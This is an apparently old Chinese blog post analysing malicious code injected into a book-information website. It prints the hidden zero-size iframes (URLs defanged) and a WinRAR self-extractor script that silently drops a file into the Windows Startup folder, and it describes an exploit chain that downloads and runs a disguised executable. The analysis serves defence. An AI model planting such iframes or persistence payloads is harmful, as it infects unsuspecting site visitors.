某图书信息网被加入恶意代码

本文分析了一种利用CHM文件格式漏洞传播恶意代码的方法。恶意代码通过在图书信息网页中嵌套iframe加载,最终导致下载并执行恶意文件caohui.css。此文件是一个WinRAR自解压文件,其目标是在特定目录下释放一个名为dnserror.htm的文件。

endurer 原创

2006-11-08 第1

该图书信息网首页首部被加入代码:

<iframe src=hxxp://www*.book***info**.com.cn/change.htm width=0 height=0 frameborder=0></iframe>

change.htm 的内容为:
/--------
<html>
<iframe src="hxxp://www*.book***info**.com.cn/ind/caohui.htm" width="0" height="0" frameborder="0"></iframe>

<iframe src="hxxp://hk.myblog.yahoo.com/f*4-stu**dent*" width="0" height="0" frameborder="0"></iframe>

<iframe src="hxxp://blog.q**oo*z*a.hk/tmcf4student/" width="0" height="0" frameborder="0"></iframe>
</html>
--------/

hxxp://www*.book***info**.com.cn/ind/caohui.htm 的内容为加入多余空格的利用CHM漏洞的恶意代码,会下载2个文件:


1、caohui.gif 为加入多余空格的脚本程序,文件长度为 117 KB (120,006 字节),功能为:创建并运行c:/caohui.hta。
c:/caohui.hta的功能为:
1)从IE临时文件夹中寻找caohui.css,复制为C:/soft.exe并运行。
2)创建文件c:/wins.bat来删除自己。

caohui.css 其实是一个WinRAR制作的自解压文件,文件长度为 20,006 字节,解压脚本为:
/--------
包含; 下列註解包含自解檔指令碼命令

Path=C:/Documents and Settings/All Users/「開始」功能表/程式集/啟動/
SavePath
Silent=1
Overwrite=1
--------/

把文件解压到C:/Documents and Settings/All Users/「開始」功能表/程式集/啟動/ 下……

这对使用简体中文版的Windows用户不起作用罢?^_^!

包中的文件为 dnserror.htm,文件长度为 3,260 字节,其中包含代码:

/--------
<iframe src="hxxp://home.tmcss.edu.hk/~t*m*c-02**016/change.htm" width="0" height="0" frameborder="0"></iframe>
--------/

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值